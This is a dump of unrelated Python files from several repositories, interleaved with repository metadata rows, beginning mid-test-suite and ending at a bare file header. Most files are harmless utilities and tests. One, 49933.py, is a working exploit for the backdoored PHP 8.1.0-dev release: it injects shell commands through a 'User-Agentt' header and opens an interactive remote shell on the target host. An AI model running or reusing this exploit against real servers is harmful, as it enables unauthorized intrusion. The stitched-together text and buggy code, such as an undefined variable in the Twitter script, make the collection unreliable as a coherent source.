Field('b', None, Mock(return_value=[[1], [2]]))
]),
Node('c', [
Field('d', None, Mock(return_value=[[3], [4]])),
Link('e', TypeRef['a'], Mock(return_value=value),
requires='d'),
]),
Root([
Link('f', Sequence[TypeRef['c']], Mock(return_value=[1, 2]),
requires=None),
]),
]),
build([Q.f[Q.e[Q.b]]]),
)
err.match(re.escape(
"Can't store link values, node: 'c', link: 'e', expected: "
"list (len: 2), returned: {!r}".format(value)
))
@pytest.mark.parametrize('value', [1, [], [1, []], [[], 2], [[], [], []]])
def test_node_link_many_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
Field('b', None, Mock(return_value=[[1], [2]]))
]),
Node('c', [
Field('d', None, Mock(return_value=[[3], [4]])),
Link('e', Sequence[TypeRef['a']], Mock(return_value=value),
requires='d'),
]),
Root([
Link('f', Sequence[TypeRef['c']], Mock(return_value=[1, 2]),
requires=None),
]),
]),
build([Q.f[Q.e[Q.b]]]),
)
err.match(re.escape(
"Can't store link values, node: 'c', link: 'e', expected: "
"list (len: 2) of lists, returned: {!r}".format(value)
))
def test_root_field_alias():
data = {'a': 42}
def root_fields(fields):
return [data[f.name] for f in fields]
graph = Graph([
Root([
Field('a', None, root_fields),
]),
])
result = execute(graph, q.Node([
q.Field('a', alias='a1'),
q.Field('a', alias='a2'),
]))
check_result(result, {'a1': 42, 'a2': 42})
def test_node_field_alias():
data = {'x1': {'a': 42}}
@listify
def x_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
graph = Graph([
Node('X', [
Field('a', None, x_fields),
]),
Root([
Link('x', TypeRef['X'], lambda: 'x1', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x', q.Node([
q.Field('a', alias='a1'),
q.Field('a', alias='a2'),
])),
]))
check_result(result, {'x': {'a1': 42, 'a2': 42}})
def test_root_link_alias():
data = {
'xN': {'a': 1, 'b': 2},
}
@listify
def x_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
graph = Graph([
Node('X', [
Field('a', None, x_fields),
Field('b', None, x_fields),
]),
Root([
Link('x', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x', q.Node([q.Field('a')]), alias='x1'),
q.Link('x', q.Node([q.Field('b')]), alias='x2'),
]))
check_result(result, {
'x1': {'a': 1},
'x2': {'b': 2},
})
def test_node_link_alias():
data = {
'yN': {'a': 1, 'b': 2},
}
x2y = {'xN': 'yN'}
@listify
def y_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
graph = Graph([
Node('Y', [
Field('a', None, y_fields),
Field('b', None, y_fields),
]),
Node('X', [
Field('id', None, id_field),
Link('y', TypeRef['Y'],
lambda ids: [x2y[i] for i in ids],
requires='id'),
]),
Root([
Link('x', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x', q.Node([
q.Link('y', q.Node([q.Field('a')]), alias='y1'),
q.Link('y', q.Node([q.Field('b')]), alias='y2'),
])),
]))
check_result(result, {
'x': {
'y1': {'a': 1},
'y2': {'b': 2},
}
})
def test_conflicting_fields():
x_data = {'xN': {'a': 42}}
@listify
def x_fields(fields, ids):
for i in ids:
yield ['{}-{}'.format(x_data[i][f.name], f.options['k'])
for f in fields]
graph = Graph([
Node('X', [
Field('a', None, x_fields, options=[Option('k', Integer)]),
]),
Root([
Link('x1', TypeRef['X'], lambda: 'xN', requires=None),
Link('x2', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x1', q.Node([q.Field('a', options={'k': 1})])),
q.Link('x2', q.Node([q.Field('a', options={'k': 2})])),
]))
check_result(result, {
'x1': {'a': '42-1'},
'x2': {'a': '42-2'},
})
def test_conflicting_links():
data = {
'yA': {'a': 1, 'b': 2},
'yB': {'a': 3, 'b': 4},
'yC': {'a': 5, 'b': 6},
}
x2y = {'xN': ['yA', 'yB', 'yC']}
@listify
def y_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
@listify
def x_to_y_link(ids, options):
for i in ids:
yield [y for y in x2y[i] if y not in options['exclude']]
graph = Graph([
Node('Y', [
Field('a', None, y_fields),
Field('b', None, y_fields),
]),
Node('X', [
Field('id', None, id_field),
Link('y', Sequence[TypeRef['Y']], x_to_y_link, requires='id',
options=[Option('exclude', None)]),
]),
Root([
Link('x1', TypeRef['X'], lambda: 'xN', requires=None),
Link('x2', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x1', q.Node([
q.Link('y', q.Node([q.Field('a')]),
options={'exclude': ['yA']}),
])),
q.Link('x2', q.Node([
q.Link('y', q.Node([q.Field('b')]),
options={'exclude': ['yC']}),
])),
]))
check_result(result, {
'x1': {'y': [{'a': 3}, {'a': 5}]},
'x2': {'y': [{'b': 2}, {'b': 4}]},
})
def test_process_ordered_node():
ordering = []
def f1(fields):
names = tuple(f.name for f in fields)
ordering.append(names)
return names
def f2(fields):
return f1(fields)
def f3():
ordering.append('x1')
return 'x1'
@listify
def f4(fields, ids):
for i in ids:
yield ['{}-e'.format(i) for _ in fields]
graph = Graph([
Node('X', [
Field('e', None, f4),
]),
Root([
Field('a', None, f1),
Field('b', None, f1),
Field('c', None, f2),
Field('d', None, f2),
Link('x', TypeRef['X'], f3, requires=None),
]),
])
query = q.Node([
q.Field('d'),
q.Field('b'),
q.Field('a'),
q.Link('x', q.Node([
q.Field('e'),
])),
q.Field('c'),
], ordered=True)
engine = Engine(SyncExecutor())
result = engine.execute(graph, query)
check_result(result, {
'a': 'a',
'b': 'b',
'c': 'c',
'd': 'd',
'x': {
'e': 'x1-e',
},
})
assert ordering == [('d',), ('b', 'a'), 'x1', ('c',)]
| 27.780526
| 80
| 0.476355
| 0
| 0
| 5,684
| 0.316235
| 5,150
| 0.286525
| 0
| 0
| 2,284
| 0.127072
|
65a1c52735b77b5b062b18c86f7b8f8507e5e9d2
| 90
|
py
|
Python
|
helper.py
|
b-nguyen/cs3240-labdemo
|
ee8da87092bc46d6a774fa5030283224819a4b87
|
[
"MIT"
] | null | null | null |
helper.py
|
b-nguyen/cs3240-labdemo
|
ee8da87092bc46d6a774fa5030283224819a4b87
|
[
"MIT"
] | null | null | null |
helper.py
|
b-nguyen/cs3240-labdemo
|
ee8da87092bc46d6a774fa5030283224819a4b87
|
[
"MIT"
] | null | null | null |
__author__ = 'Brian Nguyen'
def greeting(msg):
print("We would like to say: " + msg)
| 18
| 41
| 0.655556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.422222
|
65a24baaac6c0fcc20473db9883448f3352703ee
| 6,251
|
py
|
Python
|
twitter_verified_blocker.py
|
antoinemcgrath/twitter_blocker_tool
|
f4c0ed866830259a5ae6844dbb5fbdac8b3674b2
|
[
"MIT"
] | null | null | null |
twitter_verified_blocker.py
|
antoinemcgrath/twitter_blocker_tool
|
f4c0ed866830259a5ae6844dbb5fbdac8b3674b2
|
[
"MIT"
] | null | null | null |
twitter_verified_blocker.py
|
antoinemcgrath/twitter_blocker_tool
|
f4c0ed866830259a5ae6844dbb5fbdac8b3674b2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
#### A tool for blocking all verified users on Twitter.
## You may want to create a (public or private) Twitter list named 'exceptions' and add verified users to it.
## This 'exceptions' list that you create on Twitter is for verified accounts that you like and do not want to block.
#### Import dependencies
import json
import tweepy
import re
import random
import sys
import timeit
#### Define variables
start = timeit.default_timer()
exception_title = 'exceptions'
mypath = "blocked.txt"
counter = 0
def get_api_keys():
#### Set Twitter API key dictionary
try: #### Attempt to load API keys file
keys_json = json.load(open('/usr/local/keys.json'))
#### Specify key dictionary wanted (generally [Platform][User][API])
Keys = keys_json["Twitter"]["ClimateCong_Bot"]["ClimatePolitics"]
#Keys = keys_json["Twitter"]["AGreenDCBike"]["HearHerVoice"]
except Exception as e:
er = e
if er.errno == 2: #File not found enter key dictionary values manually
print("\nNo twitter API key was found in /usr/local/keys.json\n",
"Acquire an API key at https://apps.twitter.com/\n",
"to supply key manually press Enter\n")
Keys = {}
Keys['Consumer Key (API Key)'] = input('Enter the Twitter API Consumer Key\n')
Keys['Consumer Secret (API Secret)'] = input('Enter tdhe Twitter API Consumer Secret Key\n')
Keys['Bearer Token'] = input('Enter the Bearer Token\n')
Keys['Owner'] = input('Enter your Twitter username associated with the API keys\n')
else:
print(e)
return(Keys)
#### Get keys
Keys = get_api_keys()
#### Access Twitter API using Tweepy & key dictionary definitions
client = tweepy.Client( Keys['Bearer Token'] )
auth = tweepy.OAuth2AppHandler( Keys['Consumer Key (API Key)'], Keys['Consumer Secret (API Secret)'] )
api = tweepy.API(auth)
#### Fetch the user id's of those listed in the exceptions list
def get_exceptions_list():
listed = []
protect_list = []
for page in tweepy.Cursor(api.list_members, user, exception_title).pages():
listed.extend(page)
for x in listed:
protect_list.append(x.id)
return(protect_list)
#### Checks id against exceptions list
def check_exceptions_list(a_user_id_2_block):
if a_user_id_2_block in protect_list:
#print("User is on exceptions list & will not be blocked:", a_user_id_2_block, end='\r')
return None
else:
return(a_user_id_2_block)
#### Returns a human readable time difference
def calc_time():
#Stop the timer
stop = timeit.default_timer()
total_time = stop - start
#Formate running time.
mins, secs = divmod(total_time, 60)
hours, mins = divmod(mins, 60)
timed = str("%d:%d:%d" % (hours, mins, secs))
return(timed)
#### Check if user is already blocked, blocks & add to list if not
def append_to_blocked_list(a_user_id_2_block):
with open(mypath, "r+", newline=None) as file:
for line in file:
if str(a_user_id_2_block) in line:
#print("Previously added to block list")
return None
else: # not found, we are at the eof
pass
file.write(str(a_user_id_2_block) + '\n') # append missing data
try:
api.create_block(a_user_id_2_block, wait_on_rate_limit=True)
except (ConnectionError, TimeoutError):
print("Will retry again in a little bit")
input("Press Enter to continue...")
except Exception as e:
er = e
if e.api_code == 160:
print("Request to befriend made, pending approval")
if e.api_code == 50:
print("User not found", str(a_user_id_2_block))
return("New")
#### Increments counter by 1, if count is divisible by 100 print the count & time elapsed.
def add_2_counter(counter):
counter += 1
if counter % 100 == 0:
timed = calc_time()
print("Time elapsed:", timed, " Users blocked:", str(counter))
else:
print(counter, end='\r')
pass
return(counter)
#### Process user id, check exceptions list, check & block & append to blocked list, trigger counter
def process_a_user_id(a_user_id, counter):
a_user_id_2_block = check_exceptions_list(a_user_id)
if a_user_id_2_block is not None:
#Check if user is already blocked & block if not
new_block = append_to_blocked_list(a_user_id_2_block)
if new_block is not None:
counter = add_2_counter(counter)
return(counter)
#### Get an id from user & send to id processing
def process_a_user(a_user, counter):
if a_user.verified == True:
a_user_id = a_user.id
counter = process_a_user_id(a_user_id, counter)
else:
pass
return(counter)
#### Work flow
#### Acquire 'exceptions' list for blocking protection/exclusion
protect_list = get_exceptions_list()
print("Protect list number of entries =", len(protect_list))
#### Block verified users that are on the twitter managed verified list
for a_user_id_2_block in tweepy.Cursor(api.friends_ids, id="verified", wait_on_rate_limit=True).items():
counter = process_a_user_id(a_user_id_2_block, counter)
#### Block verified users that are following you
for a_user in tweepy.Cursor(api.followers, screen_name=user, wait_on_rate_limit=True).items():
counter = process_a_user(a_user, counter)
#### Block verified users that are following the user handle "Twitter"
for a_user in tweepy.Cursor(api.followers, screen_name="Twitter", wait_on_rate_limit=True).items():
counter = process_a_user(a_user, counter)
###################################################################
# Do not use any of the code I have written with harmful intent. #
# #
# By using this code you accept that everyone has the #
# right to choose their own gender identity. #
###################################################################
| 38.58642
| 117
| 0.628379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,838
| 0.454007
|
65a29ad725144c4d2dc24167982660ac5a79324c
| 586
|
py
|
Python
|
src/pktmapper/common.py
|
Sapunov/pktmapper
|
9d72a42c5b756c10c7fb0debcfc6c20031626aa1
|
[
"MIT"
] | null | null | null |
src/pktmapper/common.py
|
Sapunov/pktmapper
|
9d72a42c5b756c10c7fb0debcfc6c20031626aa1
|
[
"MIT"
] | null | null | null |
src/pktmapper/common.py
|
Sapunov/pktmapper
|
9d72a42c5b756c10c7fb0debcfc6c20031626aa1
|
[
"MIT"
] | null | null | null |
"""
Common functions
---
Package: PACKET-MAPPER
Author: Sapunov Nikita <kiton1994@gmail.com>
"""
import netaddr
import socket
def ip2str(address):
"""
Print out an IP address given a string
Args:
address (inet struct): inet network address
Returns:
str: Printable/readable IP address
"""
return socket.inet_ntop(socket.AF_INET, address)
def ip2long(ip):
"""
Convert an IP string to long.
Args:
ip: readable IP address
Returns:
long: IP address in long format
"""
return long(netaddr.IPAddress(ip))
| 16.742857
| 52
| 0.641638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 411
| 0.701365
|
65a7dd3e05e8bc60ee17293d906552f32358fc04
| 1,236
|
py
|
Python
|
custom_packages/CustomNeuralNetworks/test_CustomNeuralNetworks/test_resnet50_unet.py
|
davidelomeo/mangroves_deep_learning
|
27ce24fe183b65f054c1d6b41417a64355cd0c9c
|
[
"MIT"
] | null | null | null |
custom_packages/CustomNeuralNetworks/test_CustomNeuralNetworks/test_resnet50_unet.py
|
davidelomeo/mangroves_deep_learning
|
27ce24fe183b65f054c1d6b41417a64355cd0c9c
|
[
"MIT"
] | null | null | null |
custom_packages/CustomNeuralNetworks/test_CustomNeuralNetworks/test_resnet50_unet.py
|
davidelomeo/mangroves_deep_learning
|
27ce24fe183b65f054c1d6b41417a64355cd0c9c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This script tests the function that builds the Un-Net model combined
# with the ResNet50 model as an encoder. The test does not look for
# numerical values but checks if the model returns am object or not.
# This is because there are several tests within the UNet class that
# checks if the input parameters are valid and returns None if they are not.
# The test simply checks if these preliminary tests work as intended.
#
# Author: Davide Lomeo
# Email: davide.lomeo20@imperial.ac.uk
# GitHub: https://github.com/acse-2020/acse2020-acse9-finalreport-acse-dl1420-3
# Date: 1 August 2021
# Version: 1.0
from CustomNeuralNetworks import resnet50_unet
def test_ResNet50Unet():
"Testing the ResNet50Unet class"
resnet50unet = resnet50_unet.ResNet50Unet(7)
function_output_1 = resnet50unet.build_model((256, 250, 3))
function_output_2 = resnet50unet.build_model((256, 256, -3))
function_output_3 = resnet50unet.build_model((300, 300, 3))
function_output_4 = resnet50unet.build_model((256, 256, 3))
assert function_output_1 is None
assert function_output_2 is None
assert function_output_3 is None
assert function_output_4 is not None
return
| 35.314286
| 79
| 0.755663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 669
| 0.541262
|
65a81a20a737d47906a247b2cf2e411a76cfdb20
| 1,988
|
py
|
Python
|
htb/Knife/exploit/49933.py
|
oonray/Notes
|
7e52bd058cce5ccf488977222fdb7d7e88aabbbf
|
[
"MIT"
] | null | null | null |
htb/Knife/exploit/49933.py
|
oonray/Notes
|
7e52bd058cce5ccf488977222fdb7d7e88aabbbf
|
[
"MIT"
] | null | null | null |
htb/Knife/exploit/49933.py
|
oonray/Notes
|
7e52bd058cce5ccf488977222fdb7d7e88aabbbf
|
[
"MIT"
] | null | null | null |
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
"""
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
if str(response) == '<Response [200]>':
print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
try:
while 1:
cmd = input("$ ")
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"User-Agentt": "zerodiumsystem('" + cmd + "');"
}
response = request.get(host, headers = headers, allow_redirects = False)
current_page = response.text
stdout = current_page.split('<!DOCTYPE html>',1)
text = print(stdout[0])
except KeyboardInterrupt:
print("Exiting...")
exit
else:
print("\r")
print(response)
print("Host is not available, aborting...")
exit
| 37.509434
| 267
| 0.667505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,365
| 0.68662
|
65a8a8d322da8f141e973ee61e8ca8e2f7c15699
| 2,271
|
py
|
Python
|
flashcards/cli.py
|
elliott-king/flashcards
|
5dd6ae3d996797b11e28b2bd8a5b0d6e038e1a5d
|
[
"MIT"
] | null | null | null |
flashcards/cli.py
|
elliott-king/flashcards
|
5dd6ae3d996797b11e28b2bd8a5b0d6e038e1a5d
|
[
"MIT"
] | null | null | null |
flashcards/cli.py
|
elliott-king/flashcards
|
5dd6ae3d996797b11e28b2bd8a5b0d6e038e1a5d
|
[
"MIT"
] | null | null | null |
"""
Module that contains the command line app.
Why does this file exist, and why not put this in __main__?
You might be tempted to import things from __main__ later, but that will cause
problems: the code will get executed twice:
- When you run `python -mflashcards` python will execute
``__main__.py`` as a script. That means there won't be any
``flashcards.__main__`` in ``sys.modules``.
- When you import __main__ it will get executed again (as a module) because
there's no ``flashcards.__main__`` in ``sys.modules``.
Also see (1) from http://click.pocoo.org/5/setuptools/#setuptools-integration
"""
import argparse
from .flashcards import start
parser = argparse.ArgumentParser(description='Command description.')
parser.add_argument('names', metavar='NAME', nargs=argparse.ZERO_OR_MORE,
help="A name of something.")
def get_arguments():
description = (
'Flashcards is a small command line tool used to study.\n'
'Shuffles the content for you and displays the title, once you think\n'
'you know the answer, by pressing [Enter] you can see the content.\n\n'
'Expected YML format (keywords are optional):\n\n'
'-\n'
' topic: Python\n'
' content: Is a widely used high-level programming language for\n'
' created by Guido van Rossum and first released in 1991.\n'
' keywords: programming, language\n'
'-\n'
' topic: Javascript\n'
' content: Is a dynamic, untyped, and interpreted programming lang.\n')
formater = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(prog='flashcards', description=description,
formatter_class=formater)
parser.add_argument('file_name', metavar='FILE_NAME',
help='YML file with flashcards content')
parser.add_argument('-O', '--ordered', action="store_true", default=False,
help='Show cards keeping the file order')
parser.add_argument('-I', '--inverted', action="store_true", default=False,
help='Hide the topic instead of the content')
return parser.parse_args()
def main():
args = get_arguments()
start(args)
| 40.553571
| 80
| 0.65742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,429
| 0.629238
|
65a8c04b64b959ed6c434b2c56b2ea70ca122b10
| 744
|
py
|
Python
|
C2C/simple_server.py
|
muhammedabdelkader/python_collection
|
7084588ab983224ccc969f63688d62fcc988263a
|
[
"MIT"
] | null | null | null |
C2C/simple_server.py
|
muhammedabdelkader/python_collection
|
7084588ab983224ccc969f63688d62fcc988263a
|
[
"MIT"
] | null | null | null |
C2C/simple_server.py
|
muhammedabdelkader/python_collection
|
7084588ab983224ccc969f63688d62fcc988263a
|
[
"MIT"
] | null | null | null |
import aiohttp
import asyncio
import time
start_time = time.time()
async def get_pokemon(session,url):
async with session.get(url) as resp:
pokemon = await resp.json()
return pokemon["name"]
async def main():
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(limit=64,verify_ssl=False)) as session:
tasks = []
for i in range(1,200):
pok_url = f"https://pokeapi.co/api/v2/pokemon/{i}"
tasks.append(asyncio.ensure_future(get_pokemon(session,pok_url)))
original_pokemon = await asyncio.gather(*tasks)
for pok in original_pokemon:
print(pok)
asyncio.run(main())
print(f"--{(time.time()-start_time)}--")
| 27.555556
| 111
| 0.629032
| 0
| 0
| 0
| 0
| 0
| 0
| 609
| 0.818548
| 79
| 0.106183
|
65a9792b2934e3a0bc3ead9a9eef72f6382f49c5
| 3,454
|
py
|
Python
|
Important_data/Thesis figure scripts/six_sigmoids.py
|
haakonvt/LearningTensorFlow
|
6988a15af2ac916ae1a5e23b2c5bde9630cc0519
|
[
"MIT"
] | 5
|
2018-09-06T12:52:12.000Z
|
2020-05-09T01:40:12.000Z
|
Important_data/Thesis figure scripts/six_sigmoids.py
|
haakonvt/LearningTensorFlow
|
6988a15af2ac916ae1a5e23b2c5bde9630cc0519
|
[
"MIT"
] | null | null | null |
Important_data/Thesis figure scripts/six_sigmoids.py
|
haakonvt/LearningTensorFlow
|
6988a15af2ac916ae1a5e23b2c5bde9630cc0519
|
[
"MIT"
] | 4
|
2018-02-06T08:42:06.000Z
|
2019-04-16T11:23:06.000Z
|
from matplotlib import rc
rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
rc('text', usetex=True)
rc('legend',**{'fontsize':11}) # Font size for legend
from mpl_toolkits.axes_grid.axislines import SubplotZero
import matplotlib as mpl
mpl.rcParams['lines.linewidth'] = 2.5
import matplotlib.pyplot as plt
from math import erf,sqrt
import numpy as np
xmin = -4; xmax = 4
x = np.linspace(xmin,xmax,1001)
y1 = lambda x: np.array([erf(0.5*i*sqrt(np.pi)) for i in x])
y2 = lambda x: np.tanh(x)
y3 = lambda x: 4./np.pi*np.arctan(np.tanh(np.pi*x/4.))
y4 = lambda x: x/np.sqrt(1.+x**2)
y5 = lambda x: 2.0/np.pi*np.arctan(np.pi/2.0 * x)
y6 = lambda x: x/(1+np.abs(x))
fig = plt.figure(1)
ax = SubplotZero(fig, 111)
fig.add_subplot(ax)
plt.subplots_adjust(left = 0.125, # the left side of the subplots of the figure
right = 0.9, # the right side of the subplots of the figure
bottom = 0.1, # the bottom of the subplots of the figure
top = 0.9, # the top of the subplots of the figure
wspace = 0., # the amount of width reserved for blank space between subplots
hspace = 0.) # the amount of height reserved for white space between subplots
plt.setp(ax, xticks=[-3,-2,-1,1,2,3], xticklabels=[" "," "," "," "," "," ",], yticks=[-1,1], yticklabels=[" "," ",])
# Make coordinate axes with "arrows"
for direction in ["xzero", "yzero"]:
ax.axis[direction].set_visible(True)
# Coordinate axes with arrow (guess what, these are the arrows)
plt.arrow(2.65, 0.0, 0.5, 0.0, color="k", clip_on=False, head_length=0.06, head_width=0.08)
plt.arrow(0.0, 1.03, 0.0, 0.1, color="k", clip_on=False, head_length=0.06, head_width=0.08)
# Remove edge around the entire plot
for direction in ["left", "right", "bottom", "top"]:
ax.axis[direction].set_visible(False)
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
colormap = plt.cm.Spectral #nipy_spectral # Other possible colormaps: Set1, Accent, nipy_spectral, Paired
colors = [colormap(i) for i in np.linspace(0, 1, 6)]
plt.title("Six sigmoid functions", fontsize=18, y=1.08)
leg_list = [r"$\mathrm{erf}\left(\frac{\sqrt{\pi}}{2}x \right)$",
r"$\tanh(x)$",
r"$\frac{2}{\pi}\mathrm{gd}\left( \frac{\pi}{2}x \right)$",
r"$x\left(1+x^2\right)^{-\frac{1}{2}}$",
r"$\frac{2}{\pi}\mathrm{arctan}\left( \frac{\pi}{2}x \right)$",
r"$x\left(1+|x|\right)^{-1}$"]
for i in range(1,7):
s = "ax.plot(x,y%s(x),color=colors[i-1])" %(str(i))
eval(s)
ax.legend(leg_list,loc="best", ncol=2, fancybox=True) # title="Legend", fontsize=12
# ax.grid(True, which='both')
ax.set_aspect('equal')
ax.set_xlim([-3.1,3.1])
ax.set_ylim([-1.1,1.1])
ax.annotate('1', xy=(0.08, 1-0.02))
ax.annotate('0', xy=(0.08, -0.2))
ax.annotate('-1', xy=(0.08, -1-0.03))
for i in [-3,-2,-1,1,2,3]:
ax.annotate('%s' %str(i), xy=(i-0.03, -0.2))
maybe = raw_input("\nUpdate figure directly in master thesis?\nEnter 'YES' (anything else = ONLY show to screen) ")
if maybe == "YES": # Only save to disc if need to be updated
filenameWithPath = "/Users/haakonvt/Dropbox/uio/master/latex-master/Illustrations/six_sigmoids.pdf"
plt.savefig(filenameWithPath, bbox_inches='tight') #, pad_inches=0.2)
print 'Saved over previous file in location:\n "%s"' %filenameWithPath
else:
print 'Figure was only shown on screen.'
plt.show()
| 40.635294
| 116
| 0.630573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,438
| 0.416329
|
65aa73e15457005cd520549df842b9dc33211c7c
| 3,820
|
py
|
Python
|
src/web/modules/search/controllers/search/control.py
|
unkyulee/elastic-cms
|
3ccf4476c3523d4fefc0d8d9dee0196815b81489
|
[
"MIT"
] | 2
|
2017-04-30T07:29:23.000Z
|
2017-04-30T07:36:27.000Z
|
src/web/modules/search/controllers/search/control.py
|
unkyulee/elastic-cms
|
3ccf4476c3523d4fefc0d8d9dee0196815b81489
|
[
"MIT"
] | null | null | null |
src/web/modules/search/controllers/search/control.py
|
unkyulee/elastic-cms
|
3ccf4476c3523d4fefc0d8d9dee0196815b81489
|
[
"MIT"
] | null | null | null |
import json
import urllib2
import traceback
import cgi
from flask import render_template, request
import web.util.tools as tools
import lib.http as http
import lib.es as es
from web import app
from lib.read import readfile
def get(p):
host = p['c']['host']; index = p['c']['index'];
# debug
p['debug'] = tools.get('debug', '')
# search keyword
p["q"] = tools.get('q', p['c']['query'])
# pagination
p["from"] = int(tools.get('from', 0))
p["size"] = int(tools.get('size', p['c']['page_size']))
# sort
p['sort_field'] = tools.get('sort_field', p['c']['sort_field'])
p['sort_dir'] = tools.get('sort_dir', p['c']['sort_dir'])
# selected app
p['selected_app'] = tools.get('app')
# search query
p["q"] = p["q"].replace('"', '\\"') # escape some special chars
p['search_query'] = render_template("search/search_query.html", p=p)
p["q"] = tools.get('q', p['c']['query']) # restore to what was entered originally
# send search request
try:
search_url = "{}/{}/post/_search".format(host, index)
p['response'] = http.http_req_json(search_url, "POST", p['search_query'])
except urllib2.HTTPError, e:
raise Exception("url: {}\nquery: {}\{}".format(
search_url, p['search_query'], e.read()))
# process the search result
p['post_list'] = []
for r in p['response']["hits"]["hits"]:
item = {}
# first take items from the fields
for k, v in r["_source"].items():
item[k] = v
# fetch highlight
if r.get('highlight'):
for k, v in r["highlight"].items():
if k == "url" or k == "_index" or k == "app":
continue
value = cgi.escape(v[0])
value = value.replace("::highlight::", "<font color=red>")
value = value.replace("::highlight_end::", "</font>")
item[k] = value
# produce standard fields
if r.get('_index') and not item.get('app'):
item['app'] = r.get('_index')
if not item.get('url'):
item['url'] = '{}/redirect?index={}&id={}'.format(
p.get('url'),
r.get('_index'),
r.get('_id'))
# Save to SearchResult
p['post_list'].append(item)
# Application Lists
p['applications'] = []
if p['response'].get('aggregations'):
internal = p['response']['aggregations']['internal']['buckets']
p['applications'].extend(
[item for item in internal if item.get('key') != 'search']
)
external = p['response']['aggregations']['external']['buckets']
p['applications'].extend(external)
# sort based on the count
p['applications'] = sorted(p['applications'],
key=lambda x: x['doc_count'], reverse=True)
# Feed Pagination
p["total"] = int(p['response']["hits"]["total"])
# Suggestion
p["suggestion"] = []; AnySuggestion = False;
# suggest.didyoumean[].options[].text
if p['response']["suggest"].get("didyoumean"):
for idx, term in enumerate(p['response']["suggest"].get("didyoumean")):
p["suggestion"].append(term["text"])
for o in term["options"]:
AnySuggestion = True
p["suggestion"][idx] = o["text"]
break # just take the first option
# if there are no suggestions then don't display
if not AnySuggestion: p["suggestion"] = []
# return json format
if tools.get("json"):
callback = tools.get("callback")
if not callback:
return json.dumps(p['response'])
else:
return "{}({})".format(callback, json.dumps(p['response']))
return render_template("search/default.html", p=p)
| 33.217391
| 85
| 0.546073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,491
| 0.390314
|
65aa8588c528dddf9da0b75de2f8177f0b66e0ef
| 1,043
|
py
|
Python
|
Go6/policy_probabilistic_player.py
|
skyu0221/cmput496
|
ad1e59805ab49324ec1e387ddeaf3dd3202518bc
|
[
"MIT"
] | null | null | null |
Go6/policy_probabilistic_player.py
|
skyu0221/cmput496
|
ad1e59805ab49324ec1e387ddeaf3dd3202518bc
|
[
"MIT"
] | null | null | null |
Go6/policy_probabilistic_player.py
|
skyu0221/cmput496
|
ad1e59805ab49324ec1e387ddeaf3dd3202518bc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
from board_util import GoBoardUtil
from gtp_connection import GtpConnection
class PolicyPlayer(object):
"""
Plays according to the Go4 playout policy.
No simulations, just random choice among current policy moves
"""
version = 0.1
name = "Policy Probabilistic Player"
def __init__(self):
pass
def get_move(self, board, toplay):
return GoBoardUtil.generate_probabilistic( \
GoBoardUtil.generate_prob_playout_moves( board ) )
def policy(self,board,color):
return self.get_move( board, color )
def run(self, board, color, print_info=False):
pass
def reset(self):
pass
def update(self, move):
pass
def get_properties(self):
return dict(
version=self.version,
name=self.__class__.__name__,
)
def createPolicyPlayer():
con = GtpConnection(PolicyPlayer())
con.start_connection()
if __name__=='__main__':
createPolicyPlayer()
| 22.673913
| 80
| 0.633749
| 799
| 0.766059
| 0
| 0
| 0
| 0
| 0
| 0
| 189
| 0.181208
|
65ac271abc5546a6ef5541faf5bc32786bb4d4dc
| 1,531
|
py
|
Python
|
test_models.py
|
ChirilaLaura/covid-z
|
f1cc0818831519404486cd2fd2e78c36b789de24
|
[
"MIT"
] | 2
|
2020-05-14T03:02:22.000Z
|
2020-06-16T10:05:44.000Z
|
test_models.py
|
ChirilaLaura/covid-z
|
f1cc0818831519404486cd2fd2e78c36b789de24
|
[
"MIT"
] | null | null | null |
test_models.py
|
